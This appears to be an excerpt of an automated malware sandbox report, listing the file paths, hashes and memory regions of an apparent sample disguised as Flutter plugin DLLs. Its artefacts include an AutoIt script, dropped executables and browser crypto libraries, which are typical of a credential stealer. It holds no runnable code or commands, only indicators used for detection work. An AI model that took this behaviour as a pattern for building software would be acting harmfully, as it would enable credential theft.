C:\Users\Admin\Desktop\files\tray_manager_plugin.dll

MD5 65dcbb76cbb2bbb1684186f1520e888d
SHA1 25d656c1cb3c814776779bc53e0e2b937d8441f4
SHA256 9c7e0de576932c8b2149849c96f3493bcae215f6db5996dbaf5ae1788697e8f0
SHA512 e351547e551943db0267828e283797c81b593ec303cee4d4447226e86927acac93b87226e79e1a913a1ec397b4183b7ee81a2af8764f71d7fa73c41bb102d9ca

C:\Users\Admin\Desktop\files\windows_single_instance_plugin.dll

MD5 00c451a17ddfcd810086fb2ad794125a
SHA1 feba77a0ca91f828099a3444a93ff11b6ce40fe5
SHA256 f1430479210c19093d76435e5826e3578420933248b51164e11f0992f77ed1f1
SHA512 6ea4d2556e0b82d017cde2a3c5c9b2881daca6b5af0e92cd10be886047eb6303085244ac1bb764e96595b3ca448504591c976dfefbffca8c6cbabe28f81e78c3

C:\Users\Admin\Desktop\files\url_launcher_windows_plugin.dll

MD5 7e6a40e0083af22b186b662553d679fc
SHA1 b74c38d1d33004fb27b1df8003ecd4b87a5739c1
SHA256 578323ec0b492e72987778af3811cd00b71171b1e84b92e720964543f8f3a183
SHA512 3ac74e807bddffc2965cb3878a51e5c7c3b5eab2dcf8bc1ffaa41a56e20460cd01ff6b9a00d78e1aa021f5b9c38ba4f4726d37bf42749da4fa208e3f8985c114

C:\Users\Admin\Desktop\files\flutter_desktop_sleep_plugin.dll

MD5 ae8bbd77a997d05c06e459f0f3faa5af
SHA1 843ae129debba252eaebce0459adccddc1315826
SHA256 9600697c57da5a1411a227eb5fc135f20d0ea292f458290d15fb959c1f75537e
SHA512 13067ed69244f94206e642b408143409b48fb976221dbbbbdd86f0b357a8b7b0cad334a6259751a718f2149e183d322bb8b03e26abff2cdcac2826a551e27d2f

C:\Users\Admin\Desktop\files\hermit.txt

MD5 11a43b5161b53ce2f30dde8d872a6ed9
SHA1 a228ba7eacae17c6a5d8ed8d5f4554ed34705fcc
SHA256 5dd1ab29e1689994bbcae99c892cb98316e755623b747a783a2e43e56d58fa68
SHA512 c0d391c4fa7a6f653c85e1716584a31ac7f3d3975ea5c8cc0f23753c48d259119d34b725981ddbb3b74b20f5f06394eb175d7c6a297dd4f6deaf907c4e696baf

memory/4368-96-0x00007FFAF19B0000-0x00007FFAF1B22000-memory.dmp

memory/4368-107-0x00007FFAF19B0000-0x00007FFAF1B22000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\a79c4c8b

MD5 ef069a8842295778f14e496b1688cb28
SHA1 db5a1c7cf305a71a05a4c86e6455763ce394da8c
SHA256 3981d211a9aa782eff3e689ad04b57f6f7c14b3e2e397ac733013cc3d1bccb53
SHA512 286d1d9429e18bce08d4dd2dd4d1562beee3b80d31c23481c0c21139bd07fd0b1882f9e7913bf39ca238ef056ec189a5424b336fbedc276e312be116de269aa5

memory/4136-110-0x00007FFB11E30000-0x00007FFB12025000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\coml.au3

MD5 c56b5f0201a3b3de53e561fe76912bfd
SHA1 2a4062e10a5de813f5688221dbeb3f3ff33eb417
SHA256 237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d
SHA512 195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c

memory/3820-116-0x0000000001030000-0x000000000177C000-memory.dmp

memory/3820-118-0x00007FFB11E30000-0x00007FFB12025000-memory.dmp

memory/3820-119-0x0000000001030000-0x000000000177C000-memory.dmp

memory/3820-123-0x0000000061E00000-0x0000000061EF3000-memory.dmp

C:\ProgramData\BAEBGCFIEHCF\nss3.dll

MD5 1cc453cdf74f31e4d913ff9c10acdde2
SHA1 6e85eae544d6e965f15fa5c39700fa7202f3aafe
SHA256 ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5
SHA512 dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

C:\ProgramData\BAEBGCFIEHCF\mozglue.dll

MD5 c8fd9be83bc728cc04beffafc2907fe9
SHA1 95ab9f701e0024cedfbd312bcfe4e726744c4f2e
SHA256 ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a
SHA512 fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

memory/3820-191-0x0000000001030000-0x000000000177C000-memory.dmp

C:\ProgramData\GHIJJEGDBF.exe

MD5 6cfddd5ce9ca4bb209bd5d8c2cd80025
SHA1 424da82e9edbb6b39a979ab97d84239a1d67c48b
SHA256 376e1802b979514ba0e9c73933a8c6a09dd3f1d2a289f420c2202e64503d08a7
SHA512 d861130d87bfedc38a97019cba17724067f397e6ffe7e1384175db48c0a177a2e7e256c3c933d0f42766e8077f767d6d4dc8758200852e8ec135736daee7c0f8

memory/2544-205-0x0000000000570000-0x0000000000A83000-memory.dmp

C:\ProgramData\AECAECFCAA.exe

MD5 daaff76b0baf0a1f9cec253560c5db20
SHA1 0311cf0eeb4beddd2c69c6e97462595313a41e78
SHA256 5706c6f5421a6a34fdcb67e9c9e71283c8fc1c33499904519cbdc6a21e6b071c
SHA512 987ca2d67903c65ee1075c4a5250c85840aea26647b1d95a3e73a26dcad053bd4c31df4ca01d6cc0c196fa7e8e84ab63ed4a537f72fc0b1ee4ba09cdb549ddf3

memory/3160-220-0x00000000006A0000-0x00000000008E8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\55769726

MD5 8d443e7cb87cacf0f589ce55599e008f
SHA1 c7ff0475a3978271e0a8417ac4a826089c083772
SHA256 e2aaaa1a0431aab1616e2b612e9b68448107e6ce71333f9c0ec1763023b72b2a
SHA512 c7d0ced6eb9e203d481d1dbdd5965278620c10cdc81c02da9c4f7f99f3f8c61dfe975cf48d4b93ccde9857edb881a77ebe9cd13ae7ef029285d770d767aa74a5

memory/2544-226-0x0000000072C50000-0x0000000072DCB000-memory.dmp

memory/3160-228-0x0000000072C50000-0x0000000072DCB000-memory.dmp

memory/2544-229-0x00007FFB11E30000-0x00007FFB12025000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\55b01311

MD5 c62f812e250409fbd3c78141984270f2
SHA1 9c7c70bb78aa0de4ccf0c2b5d87b37c8a40bd806
SHA256 d8617477c800cc10f9b52e90b885117a27266831fb5033647b6b6bd6025380a8
SHA512 7573ecac1725f395bbb1661f743d8ee6b029f357d3ef07d0d96ee4ff3548fe06fab105ee72be3e3964d2053de2f44245cca9a061d47c1411949840c84f6e9092

memory/3160-230-0x00007FFB11E30000-0x00007FFB12025000-memory.dmp

memory/3820-234-0x0000000001030000-0x000000000177C000-memory.dmp

memory/3820-235-0x0000000001030000-0x000000000177C000-memory.dmp

memory/2544-236-0x0000000072C50000-0x0000000072DCB000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\58386f15

MD5 892b67fa0e0f7eb0293fc8ce61155e0b
SHA1 8fd55c32e44dea8165c8263f875f04d6e83711f0
SHA256 cbc0cb3be1af3785b77e7cbf807a5757dc777780daffa25e296df65b59d4e17e
SHA512 ecd3f77729cbe4ddde065bb6d59cef14752ea3140ee88c4c42ecb9483317d0f52dc3c12590c35977d01a55baca14160beb58a56e44ed4610388adef4c0ceae21

memory/3160-239-0x0000000072C50000-0x0000000072DCB000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\598ea492

MD5 915918feadba794afbcbb4df7a2d6099
SHA1 3e6bf083fdc9170cbed6eedf1485055f4e5a8f82
SHA256 c06762e4b0f4dbccdc4d24e33402b2fc8faa45a7ab2b5673167d78c2433cfaa9
SHA512 255b39b14e16d06379d1b15faa204fd84da4368b0fdcc242526244319f68a2c08e37f2fa4c3edb4c957286027ca75252b845aa70c942e6826c5322548e74380e

C:\ProgramData\BAEBGCFIEHCF\FHJDGH

MD5 ad8d9a6ea592a6c8a78c67a805cec952
SHA1 3e9f35013044be456f33e300418453ab12c70df8
SHA256 696c10112d8b86a46e5057cbd0bf40728e79c6bb49cda1f2c67fe45d0fc1258d
SHA512 31c1b5717432b67e6b150911747f34e8099c1a0870262bb3b5d3ac5c9e28b3b08e4239bd105408318806f983b3fcd10e617b2385511c46efe9fe58a9cd4a7067

memory/3876-249-0x00007FFB11E30000-0x00007FFB12025000-memory.dmp

memory/2904-250-0x00007FFB11E30000-0x00007FFB12025000-memory.dmp

memory/3820-260-0x0000000001030000-0x000000000177C000-memory.dmp

memory/3876-261-0x0000000072C50000-0x0000000072DCB000-memory.dmp

C:\ProgramData\BAEBGCFIEHCF\VCRUNT~1.DLL

MD5 a37ee36b536409056a86f50e67777dd7
SHA1 1cafa159292aa736fc595fc04e16325b27cd6750
SHA256 8934aaeb65b6e6d253dfe72dea5d65856bd871e989d5d3a2a35edfe867bb4825
SHA512 3a7c260646315cf8c01f44b2ec60974017496bd0d80dd055c7e43b707cadba2d63aab5e0efd435670aa77886ed86368390d42c4017fc433c3c4b9d1c47d0f356

C:\ProgramData\BAEBGCFIEHCF\softokn3.dll

MD5 4e52d739c324db8225bd9ab2695f262f
SHA1 71c3da43dc5a0d2a1941e874a6d015a071783889
SHA256 74ebbac956e519e16923abdc5ab8912098a4f64e38ddcb2eae23969f306afe5a
SHA512 2d4168a69082a9192b9248f7331bd806c260478ff817567df54f997d7c3c7d640776131355401e4bdb9744e246c36d658cb24b18de67d8f23f10066e5fe445f6

C:\ProgramData\BAEBGCFIEHCF\msvcp140.dll

MD5 5ff1fca37c466d6723ec67be93b51442
SHA1 34cc4e158092083b13d67d6d2bc9e57b798a303b
SHA256 5136a49a682ac8d7f1ce71b211de8688fce42ed57210af087a8e2dbc8a934062
SHA512 4802ef62630c521d83a1d333969593fb00c9b38f82b4d07f70fbd21f495fea9b3f67676064573d2c71c42bc6f701992989742213501b16087bb6110e337c7546

memory/2904-276-0x0000000072C50000-0x0000000072DCB000-memory.dmp

memory/1212-279-0x00007FFAF1BE0000-0x00007FFAF3257000-memory.dmp

memory/1212-283-0x0000000000400000-0x000000000040A000-memory.dmp

memory/3540-284-0x00007FFB11E30000-0x00007FFB12025000-memory.dmp

memory/4996-288-0x0000000140000000-0x00000001407DC000-memory.dmp

memory/4996-292-0x000002729B5A0000-0x000002729B5C0000-memory.dmp

memory/4996-291-0x0000000140000000-0x00000001407DC000-memory.dmp

memory/4996-290-0x0000000140000000-0x00000001407DC000-memory.dmp

memory/4996-297-0x0000000140000000-0x00000001407DC000-memory.dmp

memory/4996-296-0x0000000140000000-0x00000001407DC000-memory.dmp

memory/4996-295-0x0000000140000000-0x00000001407DC000-memory.dmp

memory/4996-293-0x0000000140000000-0x00000001407DC000-memory.dmp

memory/4996-294-0x0000000140000000-0x00000001407DC000-memory.dmp

memory/3540-298-0x00000000001B0000-0x0000000000221000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

MD5 0905580629d85fb977cf48d4681e5086
SHA1 3c7bf678bedbaf83ca720ab00fa9e84884ba8009
SHA256 72fd834aa73e1523e40a415313d7766832dd6497ac0a5d4cec9d36e852b248cd
SHA512 db9ae7da2801083074e54d499ef7741f7120b9a8abdd87c13e2ceb35520cd7290a4f06b6cc9c0c1060f01fe2cc0bd95b8d362029e0df90a68c17f197a50b02f4

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

MD5 a78524c7df0353916517a37d9543e6e1
SHA1 478a9f44860200e4f3c624133761d5419c3a49b9
SHA256 bbad630074e67d253f974d25bd19566f9abf2f8bd58c680080e0846c89261c19
SHA512 0c1a5b02f2547376368fcdae8c866a07461ab7b1244e5c377961febda9f98edc75e6af4d328a5d7c3a5489a79aa04cf6a0754459d230a0306210a07beadf4647

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

MD5 baf771b35afb92b92de9d4520e533dc8
SHA1 0a8c1161b98dd2e71927434f4b9f19e8377f8a1d
SHA256 a9b926d34058ed03c4fdf06cfceab4cc504bc2e7e32a777277b77ba43b19acfa
SHA512 89966493cf054c35accb13753361eae6ace6056daae90859499e1f22dc9175afd6ea4a89e3655f828254bb42a8e265e32d6d596d5b04302cd14e73c3844defbd

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

MD5 8202a1cd02e7d69597995cabbe881a12
SHA1 8858d9d934b7aa9330ee73de6c476acf19929ff6
SHA256 58f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5
SHA512 97ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9

C:\Users\Admin\AppData\Local\Temp\1000003041\run.ps1

MD5 1e49c49df1e9bb5a3646fbdd72fff72d
SHA1 ca3b2f92797030ad96341c5551812e679e9746d3
SHA256 df52ed4a147cad99aec03614368f8781e806c45be6e046ec4a73a26e7ec9cd10
SHA512 b0c96599de30f1822ddc99d1fed6341ae06f25a171c52b9a78f6304d02a30f8da41738d4af4b4c8365b0b52739b3df03be99dddf764f12f724bd24a91b59c82d

memory/4668-311-0x0000000002510000-0x0000000002546000-memory.dmp

memory/4668-312-0x0000000004F10000-0x0000000005538000-memory.dmp

memory/4668-313-0x0000000004E70000-0x0000000004E92000-memory.dmp

memory/4668-314-0x0000000005770000-0x00000000057D6000-memory.dmp

memory/4668-315-0x00000000057E0000-0x0000000005846000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bsimd13d.vpu.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4668-325-0x0000000005850000-0x0000000005BA4000-memory.dmp

memory/4668-326-0x0000000005E20000-0x0000000005E3E000-memory.dmp

memory/4668-327-0x0000000005E40000-0x0000000005E8C000-memory.dmp

memory/4668-329-0x0000000006E80000-0x0000000006F16000-memory.dmp

memory/3540-330-0x00000000001B0000-0x0000000000221000-memory.dmp

memory/4668-332-0x00000000063C0000-0x00000000063E2000-memory.dmp

memory/4668-331-0x0000000006350000-0x000000000636A000-memory.dmp

memory/4668-333-0x00000000074D0000-0x0000000007A74000-memory.dmp

memory/4668-334-0x0000000008100000-0x000000000877A000-memory.dmp